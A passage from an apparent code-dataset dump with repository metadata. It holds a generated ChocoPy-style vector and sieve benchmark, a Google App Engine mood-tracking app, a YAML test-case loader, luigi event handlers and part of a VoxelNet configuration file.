        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2/item3 are ignored)
    def append3(self:"Vector5", item: int, item2: int, item3: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2..item4 are ignored)
    def append4(self:"Vector5", item: int, item2: int, item3: int, item4: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2..item5 are ignored)
    def append5(self:"Vector5", item: int, item2: int, item3: int, item4: int, item5: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends many items to end of vector
    def append_all(self:"Vector5", new_items: [int]) -> object:
        item:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2 is ignored)
    def append_all2(self:"Vector5", new_items: [int], new_items2: [int]) -> object:
        item:int = 0
        item2:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2/new_items3 are ignored)
    def append_all3(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
        item:int = 0
        item2:int = 0
        item3:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2..new_items4 are ignored)
    def append_all4(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
        item:int = 0
        item2:int = 0
        item3:int = 0
        item4:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2..new_items5 are ignored)
    def append_all5(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int], new_items5: [int]) -> object:
        item:int = 0
        item2:int = 0
        item3:int = 0
        item4:int = 0
        item5:int = 0
        for item in new_items:
            self.append(item)

    # Removes an item from the middle of vector
    def remove_at(self:"Vector5", idx: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2 is ignored)
    def remove_at2(self:"Vector5", idx: int, idx2: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2/idx3 are ignored)
    def remove_at3(self:"Vector5", idx: int, idx2: int, idx3: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2..idx4 are ignored)
    def remove_at4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2..idx5 are ignored)
    def remove_at5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Retrieves an item at a given index
    def get(self:"Vector5", idx: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2 is ignored)
    def get2(self:"Vector5", idx: int, idx2: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2/idx3 are ignored)
    def get3(self:"Vector5", idx: int, idx2: int, idx3: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2..idx4 are ignored)
    def get4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2..idx5 are ignored)
    def get5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> int:
        return self.items[idx]

    # Retrieves the current size of the vector
    def length(self:"Vector5") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length2(self:"Vector5") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length3(self:"Vector5") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length4(self:"Vector5") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length5(self:"Vector5") -> int:
        return self.size
# A faster (but more memory-consuming) implementation of vector
class DoublingVector(Vector):
    doubling_limit:int = 1000

    # Overriding to do fewer resizes: the backing list is doubled until
    # doubling_limit is reached, after which it grows one slot at a time.
    def increase_capacity(self:"DoublingVector") -> int:
        if self.capacity() > self.doubling_limit // 2:
            # Past the doubling limit: fall back to single-slot growth.
            self.items = self.items + [0]
        else:
            # Under the limit: double the storage in one step.
            self.items = self.items + self.items
        return self.capacity()
# A faster (but more memory-consuming) implementation of vector
# NOTE(review): inherits the base Vector, not Vector2 -- looks intentional
# in this generated benchmark, but confirm.  increase_capacity2 duplicates
# increase_capacity and reads doubling_limit (not doubling_limit2).
class DoublingVector2(Vector):
    doubling_limit:int = 1000
    doubling_limit2:int = 1000

    # Overriding to do fewer resizes
    def increase_capacity(self:"DoublingVector2") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()

    # Overriding to do fewer resizes (duplicate of increase_capacity)
    def increase_capacity2(self:"DoublingVector2") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
# A faster (but more memory-consuming) implementation of vector
# NOTE(review): inherits the base Vector, not Vector3 -- looks intentional
# in this generated benchmark, but confirm.  The *2/*3 overrides duplicate
# increase_capacity and all read doubling_limit (never doubling_limit2/3).
class DoublingVector3(Vector):
    doubling_limit:int = 1000
    doubling_limit2:int = 1000
    doubling_limit3:int = 1000

    # Overriding to do fewer resizes
    def increase_capacity(self:"DoublingVector3") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()

    # Overriding to do fewer resizes (duplicate of increase_capacity)
    def increase_capacity2(self:"DoublingVector3") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()

    # Overriding to do fewer resizes (duplicate of increase_capacity)
    def increase_capacity3(self:"DoublingVector3") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
# A faster (but more memory-consuming) implementation of vector
# NOTE(review): generated quadruplicate of DoublingVector (compiler stress test).
class DoublingVector4(Vector):
    doubling_limit:int = 1000
    doubling_limit2:int = 1000
    doubling_limit3:int = 1000
    doubling_limit4:int = 1000
    # Overriding to do fewer resizes
    def increase_capacity(self:"DoublingVector4") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
    # Overriding to do fewer resizes
    def increase_capacity2(self:"DoublingVector4") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
    # Overriding to do fewer resizes
    def increase_capacity3(self:"DoublingVector4") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
    # Overriding to do fewer resizes
    def increase_capacity4(self:"DoublingVector4") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
# A faster (but more memory-consuming) implementation of vector
# NOTE(review): generated quintuplicate of DoublingVector (compiler stress test).
class DoublingVector5(Vector):
    doubling_limit:int = 1000
    doubling_limit2:int = 1000
    doubling_limit3:int = 1000
    doubling_limit4:int = 1000
    doubling_limit5:int = 1000
    # Overriding to do fewer resizes
    def increase_capacity(self:"DoublingVector5") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
    # Overriding to do fewer resizes
    def increase_capacity2(self:"DoublingVector5") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
    # Overriding to do fewer resizes
    def increase_capacity3(self:"DoublingVector5") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
    # Overriding to do fewer resizes
    def increase_capacity4(self:"DoublingVector5") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
    # Overriding to do fewer resizes
    def increase_capacity5(self:"DoublingVector5") -> int:
        if (self.capacity() <= self.doubling_limit // 2):
            self.items = self.items + self.items
        else:
            # If doubling limit has been reached, fall back to
            # standard capacity increases
            self.items = self.items + [0]
        return self.capacity()
# Makes a vector in the range [i, j)
def vrange(i:int, j:int) -> Vector:
    v:Vector = None
    v = DoublingVector()
    # Append i, i+1, ..., j-1 in order
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Makes a vector in the range [i, j).
# The extra i2/j2 parameters are unused but kept so callers keep working;
# the dead local v2 declaration has been removed.
def vrange2(i:int, j:int, i2:int, j2:int) -> Vector:
    v:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Makes a vector in the range [i, j).
# Extra parameters are unused but kept for signature compatibility;
# dead local declarations (v2, v3) removed.
def vrange3(i:int, j:int, i2:int, j2:int, i3:int, j3:int) -> Vector:
    v:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Makes a vector in the range [i, j).
# Extra parameters are unused but kept for signature compatibility;
# dead local declarations (v2..v4) removed.
def vrange4(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int) -> Vector:
    v:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Makes a vector in the range [i, j).
# Extra parameters are unused but kept for signature compatibility;
# dead local declarations (v2..v5) removed.
def vrange5(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int, i5:int, j5:int) -> Vector:
    v:Vector = None
    v = DoublingVector()
    while i < j:
        v.append(i)
        i = i + 1
    return v
# Sieve of Eratosthenes (not really)
# Removes, in place, every later element divisible by an earlier element.
def sieve(v:Vector) -> object:
    i:int = 0
    j:int = 0
    k:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                # remove_at shifts elements left, so j is NOT advanced here
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Same trial-division pruning as sieve(), applied to v only.
# The v2 parameter is unused but kept for callers; the dead *2 locals removed.
def sieve2(v:Vector, v2:Vector) -> object:
    i:int = 0
    j:int = 0
    k:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Same trial-division pruning as sieve(), applied to v only.
# Extra parameters unused but kept; dead duplicate locals removed.
def sieve3(v:Vector, v2:Vector, v3:Vector) -> object:
    i:int = 0
    j:int = 0
    k:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Same trial-division pruning as sieve(), applied to v only.
# Extra parameters unused but kept; dead duplicate locals removed.
def sieve4(v:Vector, v2:Vector, v3:Vector, v4:Vector) -> object:
    i:int = 0
    j:int = 0
    k:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Same trial-division pruning as sieve(), applied to v only.
# Extra parameters unused but kept; dead duplicate locals removed.
def sieve5(v:Vector, v2:Vector, v3:Vector, v4:Vector, v5:Vector) -> object:
    i:int = 0
    j:int = 0
    k:int = 0
    while i < v.length():
        k = v.get(i)
        j = i + 1
        while j < v.length():
            if v.get(j) % k == 0:
                v.remove_at(j)
            else:
                j = j + 1
        i = i + 1
# Input parameter
n:int = 50
# NOTE(review): n2..n5, v2..v5 and i2..i5 are generated duplicates; only
# n, v and i feed the sieve/print below -- the rest is dead data.
n2:int = 50
n3:int = 50
n4:int = 50
n5:int = 50
# Data
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
v = vrange(2, n)
v2 = vrange(2, n)
v3 = vrange(2, n)
v4 = vrange(2, n)
v5 = vrange(2, n)
sieve(v)
# Print the surviving values (primes in [2, n)), one per line
while i < v.length():
    print(v.get(i))
    i = i + 1
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
d233c9f5599649fd4c199b8ab075c4f34ddd9e85
|
466574c2399c11c6c0aa11fda8bd5a9c80c05582
|
/earthbeat.py
|
68550468bbab46ce951be6c0646820708c0a1dda
|
[] |
no_license
|
aborilov/Earthbeat
|
167fdd76825508416514a9df9b35e521ddbb1d59
|
d63a202a7f27972047929782854ce550f1e5dfa9
|
refs/heads/master
| 2021-01-01T20:35:28.158758
| 2013-11-15T13:25:40
| 2013-11-15T13:25:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,473
|
py
|
import os
import urllib
import datetime
import logging
logging.getLogger().setLevel(logging.DEBUG)
from google.appengine.api import users
from google.appengine.ext import db
import jinja2
import webapp2
import counter
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
openIdProviders = (
'Gmail.com', # shorter alternative: "Gmail.com"
'Yahoo.com',
'MySpace.com',
'AOL.com',
'MyOpenID.com',
# add more here
)
class Mood(db.Model):
    # One historical mood sample per submission (appended by poll()).
    mood = db.BooleanProperty(indexed=True)  # True = happy ("smile"), False = sad
    name = db.StringProperty(required=True)  # holds the user_id, not a display name
    date = db.DateTimeProperty()             # timestamp of the submission
class User(db.Model):
    # Latest mood per user; updated in place by change_mood().
    mood = db.BooleanProperty(indexed=True)  # True = happy, False = sad
    name = db.StringProperty(required=True)  # user_id used as the lookup key
    date = db.DateTimeProperty()             # when the mood was last set
class MainPage(webapp2.RequestHandler):
    """Landing page: signed-in users post a mood and see the global counters."""

    def post(self):
        # Record the submitted mood ("smile" -> True/happy, anything else ->
        # False/sad) and redirect back to the GET view.
        user = users.get_current_user()
        if user:
            user_id = user.user_id()
            mood = self.request.get("mood")
            if mood:
                if mood == "smile":
                    change_mood(user_id, True)
                else:
                    change_mood(user_id, False)
        self.redirect('/')

    def get(self):
        # Signed-in: render index.html with the user's mood and both counters.
        # Anonymous: print OpenID sign-in links instead.
        user = users.get_current_user()
        if user:
            template_values = {
                'user': user.nickname(),
            }
            mood = user_mood(user.user_id())
            if mood is None:
                # No mood recorded today
                template_values['mood'] = ""
            else:
                if mood:
                    template_values['mood'] = "happy"
                else:
                    template_values['mood'] = "sad"
            template_values['smile_count'] = counter.get_count("smile_count")
            template_values['cry_count'] = counter.get_count("cry_count")
            template = JINJA_ENVIRONMENT.get_template('index.html')
            self.response.write(template.render(template_values))
        else:
            self.response.out.write('Hello world! Sign in at: ')
            for p in openIdProviders:
                p_name = p.split('.')[0]  # take "AOL" from "AOL.com"
                p_url = p.lower()  # "AOL.com" -> "aol.com"
                self.response.out.write('[<a href="%s">%s</a>]' % (
                    users.create_login_url(federated_identity=p_url), p_name))
def user_mood(user_id):
    """Return today's stored mood for *user_id*, or None if absent or stale."""
    rows = db.Query(User).filter("name", user_id).fetch(limit=1)
    today = datetime.datetime.now().date()
    if rows and rows[0].date.date() == today:
        return rows[0].mood
    return None
def increment(mood):
    """Bump the sharded counter matching *mood* (True -> smile, False -> cry)."""
    key = "smile_count" if mood else "cry_count"
    counter.increment(key)
def change_mood(user_id, mood):
    """Persist *mood* for *user_id*, append a history row and bump counters.

    Creates the User row on first submission; otherwise updates it in place.
    """
    q = db.Query(User).filter(
        "name", user_id).fetch(limit=1)
    now = datetime.datetime.now()
    if q:
        user = q[0]
        # NOTE(review): the guard is hard-coded to 1, so every POST re-counts;
        # the commented-out condition suggests it was meant to fire only on a
        # real once-per-day change. Confirm intent before "fixing".
        if 1: # user.mood != mood and user.date.date() != now.date():
            user.mood = mood
            user.date = now
            user.put()
            poll(user_id, mood)
            increment(mood)
    else:
        # First submission for this user: create the row
        u = User(mood=mood,
                 name=user_id,
                 date=now)
        u.put()
        poll(user_id, mood)
        increment(mood)
def poll(user_id, mood):
    """Append a Mood history record for *user_id* stamped with the current time."""
    entry = Mood(mood=mood, name=user_id, date=datetime.datetime.now())
    entry.put()
application = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
|
[
"aborilov@gmail.com"
] |
aborilov@gmail.com
|
f7210d705131460adae2a46d876fa95f9dae8a85
|
434da792d4c3ebf1089cb17044c1715731c5e1e5
|
/Base/BaseYaml.py
|
afa04397f842a9386838168abc980b29eb7bbbe4
|
[] |
no_license
|
testervic/AutoApp
|
d21bbb744ed542a1b8d1c9908ccce9be1bb935a9
|
1cdb5df3c268717beb9b746c5b0646606bfa6001
|
refs/heads/master
| 2020-09-29T18:11:08.646327
| 2019-12-23T08:55:55
| 2019-12-23T08:55:55
| 227,090,893
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,160
|
py
|
# -*- coding:utf-8 -*-
import yaml
from yaml.scanner import ScannerError
import os
def _fallback_result(info, msg):
    """Build the placeholder case structure returned when the YAML file is unusable.

    The two error paths previously duplicated this large literal verbatim;
    only the 'info' message and the testinfo 'msg' value differed.
    """
    return [False, {
        'check': [{'element_info': '', 'operate_type': 'get_value', 'find_type': 'ids', 'info': info}],
        'testinfo': [{'title': '', 'id': '', 'info': '', "msg": msg}],
        'testcase': [{'element_info': '', 'info': '', 'operate_type': '', 'find_type': ''},
                     {'element_info': '', 'msg': "", 'operate_type': '', 'find_type': '', 'info': ''},
                     {'element_info': '', 'msg': '', 'operate_type': '', 'find_type': '', 'info': ''},
                     {'element_info': '', 'info': '', 'operate_type': '', 'find_type': ''}]}]


def getYam(path):
    """Load a YAML test-case file.

    Returns [True, parsed] on success, or [False, placeholder] when the file
    is missing (FileNotFoundError) or malformed (ScannerError).
    """
    try:
        with open(path, encoding='utf-8') as f:
            x = yaml.load(f, Loader=yaml.FullLoader)
            return [True, x]
    except FileNotFoundError:
        print("==用例文件不存在==")
        return _fallback_result('用例文件不存在', "")
    except ScannerError:  # imported at top of file from yaml.scanner
        print("==用例格式错误==")
        return _fallback_result('用例文件格式错误', " ")
if __name__ == '__main__':
    # Ad-hoc manual test: resolve a sample YAML relative to this file and
    # print the parse result.
    import os
    PATH = lambda p: os.path.abspath(
        os.path.join(os.path.dirname(__file__), p)
    )
    t = getYam(PATH("../yaml/test.yaml"))
    print(t)
    # port = str(random.randint(4700, 4900))
    # bpport = str(random.randint(4700, 4900))
    # devices = "DU2TAN15AJ049163"
    #
    # cmd1 = "appium --session-override -p %s -bp %s -U %s" % (port, bpport, devices)
    # print(cmd1)
    # os.popen(cmd1)
|
[
"469858846@qq.com"
] |
469858846@qq.com
|
8b4b265605947d75c547d6ce871b082b102f0527
|
1cb689e6fe6171b671f8ee89bda376026ad149d8
|
/Heisenberg/xy_loss.py
|
ba6f0b387725eb94c72ed2b7f6355c1927785d39
|
[] |
no_license
|
BlazStojanovic/QptimalSampling
|
be66ad28cdee20057cdbc8e5b6468f9fb086b059
|
6bc98d0bf30dcbdfbb7cca84a9beb35e72fc7143
|
refs/heads/main
| 2023-07-17T09:34:22.140162
| 2021-08-20T10:04:35
| 2021-08-20T10:04:35
| 355,513,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11
|
py
|
xxz_loss.py
|
[
"csc2006@csc20-laptop-06"
] |
csc2006@csc20-laptop-06
|
8b1cb5d2f1d0e67df487661a59631b7b206cf622
|
a2bf77957f205aebd49cdeac24278099d1fdaab6
|
/tasks.py
|
29f9927f8e6a3db3797efae499519ba52ad71a2e
|
[
"MIT"
] |
permissive
|
gerardobort/luigi-slack
|
bf247ba079945ed5323445199f0768494201b00f
|
25672f529eb1b81e0989b15edbcde26b72f835d2
|
refs/heads/master
| 2021-01-20T20:02:53.493878
| 2016-07-21T20:38:52
| 2016-07-21T20:38:52
| 63,797,798
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
from __future__ import print_function
import json
import luigi
from luigi.format import UTF8
# Registered globally: fires after every successful luigi task run.
@luigi.Task.event_handler(luigi.Event.SUCCESS)
def celebrate_success(task):
    """Will be called directly after a successful execution
    of `run` on any Task subclass (i.e. all luigi Tasks)
    """
    print("YAY! :D")
# Registered globally: fires after any luigi task raises from run().
@luigi.Task.event_handler(luigi.Event.FAILURE)
def mourn_failure(task, exception):
    """Will be called directly after a failed execution
    of `run` on any JobTask subclass
    """
    print("OUGH! :(")
# NOTE(review): mid-file wildcard imports -- presumably pulled in for their
# handler-registration side effects; confirm nothing shadows the names above.
from slack import *
from chatterbot import *

# Script entry point: hand control to the luigi CLI runner.
if __name__ == "__main__":
    luigi.run()
|
[
"gerardo.bort@rga.com"
] |
gerardo.bort@rga.com
|
2841e95e5b631e7efb363c7224bbe1c0da796466
|
7133a0e900c2cd9b30f4f34aad80a2c1648d8cbc
|
/Activity4.py
|
14526be810d690a8a218c012832fbd3d70a4350c
|
[] |
no_license
|
Deepika-Purushan/Python_Activities
|
671db6db37da3ebf5b5f4f1029882df54658eb5f
|
54745f505c0112ff8c6f4fa6ae9631a330cacd66
|
refs/heads/master
| 2022-12-27T13:32:14.469587
| 2020-10-03T15:27:32
| 2020-10-03T15:27:32
| 293,711,675
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,754
|
py
|
"""
Using Loops:
Enhance the previously written Rock-Paper-Scissors code so that it asks the user if they want to play another round.
If they say 'Yes', the game should begin again.
If they say 'No', the game should exit.
"""
# Get the users names
U1 = input("Enter player1 Name: ")
U2 = input("Enter player2 Name: ")

while True:
    # Get the users choices (case-insensitive)
    Player1_answer = input(U1 + ", do you want to choose rock, paper or scissors? ").lower()
    Player2_answer = input(U2 + ", do you want to choose rock, paper or scissors? ").lower()
    print(Player1_answer)
    print(Player2_answer)
    # BUG FIX: validate both answers before comparing them. Previously two
    # identical invalid answers (e.g. "foo" vs "foo") were reported as a tie,
    # and an invalid Player1 answer with a valid Player2 answer fell through
    # to a wrong winner message.
    if (Player1_answer not in ('rock', 'paper', 'scissors')
            or Player2_answer not in ('rock', 'paper', 'scissors')):
        print("Invalid input! You have not entered rock, paper or scissors, try again.")
    elif Player1_answer == Player2_answer:
        print("It's a tie!")
    elif Player1_answer == 'rock':
        if Player2_answer == 'scissors':
            print("Rock wins!")
        else:
            print("Paper wins!")
    elif Player1_answer == 'scissors':
        if Player2_answer == 'paper':
            print("Scissors win!")
        else:
            print("Rock wins!")
    elif Player1_answer == 'paper':
        if Player2_answer == 'rock':
            print("Paper wins!")
        else:
            print("Scissors win!")
    # Ask both players whether to continue
    Play_again1 = input(U1 + ", do you want to play again ").lower()
    Play_again2 = input(U2 + ", do you want to play again ").lower()
    if (Play_again1 == 'yes' and Play_again2 == 'yes'):
        pass
    elif (Play_again1 == 'no' and Play_again2 == 'no'):
        raise SystemExit
    else:
        print("Invalid Input. Exiting the flow")
        raise SystemExit
|
[
"noreply@github.com"
] |
Deepika-Purushan.noreply@github.com
|
a66564dda6b8d9dbd83ae9ed5fad79389511b718
|
0c25b0d44a9f9f669d16adee7ff879cf1245a700
|
/config.py
|
d848b34673cc10b823407d9d2196c632fae5d714
|
[
"MIT"
] |
permissive
|
collector-m/best_voxelnet_ever
|
720c2ee7a3ee68d0b0bbe2d9f5efa76cfa784347
|
c175dfb777f9b37d4f4c331df737cc208946acde
|
refs/heads/master
| 2022-01-26T04:20:29.252955
| 2019-07-09T11:53:09
| 2019-07-09T11:53:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,685
|
py
|
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""VoxelNet config system.
"""
import os
import os.path as osp
import numpy as np
from time import strftime, localtime
from easydict import EasyDict as edict
import math
__C = edict()
# Consumers can get config by:
# import config as cfg
cfg = __C
# for dataset dir
__C.DATA_DIR = osp.abspath(osp.join(os.sep, 'data', 'object'))
# for gpu allocation
__C.GPU_AVAILABLE = '0'
__C.GPU_USE_COUNT = len(__C.GPU_AVAILABLE.split(','))
__C.GPU_MEMORY_FRACTION = 1
# selected object
__C.DETECT_OBJ = 'Car' # Pedestrian/Cyclist
if __C.DETECT_OBJ == 'Car':
__C.Y_MIN = -40
__C.Y_MAX = 40
__C.X_MIN = 0
__C.X_MAX = 70.4
__C.VOXEL_X_SIZE = 0.2
__C.VOXEL_Y_SIZE = 0.2
__C.VOXEL_POINT_COUNT = 35
__C.INPUT_WIDTH = int((__C.X_MAX - __C.X_MIN) / __C.VOXEL_X_SIZE)
__C.INPUT_HEIGHT = int((__C.Y_MAX - __C.Y_MIN) / __C.VOXEL_Y_SIZE)
__C.FEATURE_RATIO = 2
__C.FEATURE_WIDTH = int(__C.INPUT_WIDTH / __C.FEATURE_RATIO)
__C.FEATURE_HEIGHT = int(__C.INPUT_HEIGHT / __C.FEATURE_RATIO)
else:
__C.Y_MIN = -20
__C.Y_MAX = 20
__C.X_MIN = 0
__C.X_MAX = 48
__C.VOXEL_X_SIZE = 0.2
__C.VOXEL_Y_SIZE = 0.2
__C.VOXEL_POINT_COUNT = 45
__C.INPUT_WIDTH = int((__C.X_MAX - __C.X_MIN) / __C.VOXEL_X_SIZE)
__C.INPUT_HEIGHT = int((__C.Y_MAX - __C.Y_MIN) / __C.VOXEL_Y_SIZE)
__C.FEATURE_RATIO = 2
__C.FEATURE_WIDTH = int(__C.INPUT_WIDTH / __C.FEATURE_RATIO)
__C.FEATURE_HEIGHT = int(__C.INPUT_HEIGHT / __C.FEATURE_RATIO)
# set the log image scale factor
__C.BV_LOG_FACTOR = 4
# for data set type
__C.DATA_SETS_TYPE = 'kitti'
# Root directory of project
__C.CHECKPOINT_DIR = osp.join('checkpoint')
__C.LOG_DIR = osp.join('log')
# for data preprocess
# sensors
__C.VELODYNE_ANGULAR_RESOLUTION = 0.08 / 180 * math.pi
__C.VELODYNE_VERTICAL_RESOLUTION = 0.4 / 180 * math.pi
__C.VELODYNE_HEIGHT = 1.73
# rgb
if __C.DATA_SETS_TYPE == 'kitti':
__C.IMAGE_WIDTH = 1242
__C.IMAGE_HEIGHT = 375
__C.IMAGE_CHANNEL = 3
# top
if __C.DATA_SETS_TYPE == 'kitti':
__C.TOP_Y_MIN = -30
__C.TOP_Y_MAX = +30
__C.TOP_X_MIN = 0
__C.TOP_X_MAX = 80
__C.TOP_Z_MIN = -4.2
__C.TOP_Z_MAX = 0.8
__C.TOP_X_DIVISION = 0.1
__C.TOP_Y_DIVISION = 0.1
__C.TOP_Z_DIVISION = 0.2
__C.TOP_WIDTH = (__C.TOP_X_MAX - __C.TOP_X_MIN) // __C.TOP_X_DIVISION
__C.TOP_HEIGHT = (__C.TOP_Y_MAX - __C.TOP_Y_MIN) // __C.TOP_Y_DIVISION
__C.TOP_CHANNEL = (__C.TOP_Z_MAX - __C.TOP_Z_MIN) // __C.TOP_Z_DIVISION
# for 2d proposal to 3d proposal
__C.PROPOSAL3D_Z_MIN = -2.3 # -2.52
__C.PROPOSAL3D_Z_MAX = 1.5 # -1.02
# for RPN basenet choose
__C.USE_VGG_AS_RPN = 0
__C.USE_RESNET_AS_RPN = 0
__C.USE_RESNEXT_AS_RPN = 0
# for camera and lidar coordination convert
if __C.DATA_SETS_TYPE == 'kitti':
# cal mean from train set
__C.MATRIX_P2 = ([[719.787081, 0., 608.463003, 44.9538775],
[0., 719.787081, 174.545111, 0.1066855],
[0., 0., 1., 3.0106472e-03],
[0., 0., 0., 0]])
# cal mean from train set
__C.MATRIX_T_VELO_2_CAM = ([
[7.49916597e-03, -9.99971248e-01, -8.65110297e-04, -6.71807577e-03],
[1.18652889e-02, 9.54520517e-04, -9.99910318e-01, -7.33152811e-02],
[9.99882833e-01, 7.49141178e-03, 1.18719929e-02, -2.78557062e-01],
[0, 0, 0, 1]
])
# cal mean from train set
__C.MATRIX_R_RECT_0 = ([
[0.99992475, 0.00975976, -0.00734152, 0],
[-0.0097913, 0.99994262, -0.00430371, 0],
[0.00729911, 0.0043753, 0.99996319, 0],
[0, 0, 0, 1]
])
# Faster-RCNN/SSD Hyper params
# Per-class anchor box dimensions (L/W/H, presumably metres -- confirm),
# anchor centre height Z, and RPN positive/negative IoU thresholds.
if __C.DETECT_OBJ == 'Car':
    # car anchor
    __C.ANCHOR_L = 3.9
    __C.ANCHOR_W = 1.6
